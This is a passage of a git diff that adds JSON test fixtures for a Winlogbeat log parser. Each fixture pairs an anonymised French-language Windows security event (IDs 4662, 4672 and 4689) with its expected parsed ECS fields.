Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..59c3d35b3 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -0,0 +1,82 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..e5beffcf5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + 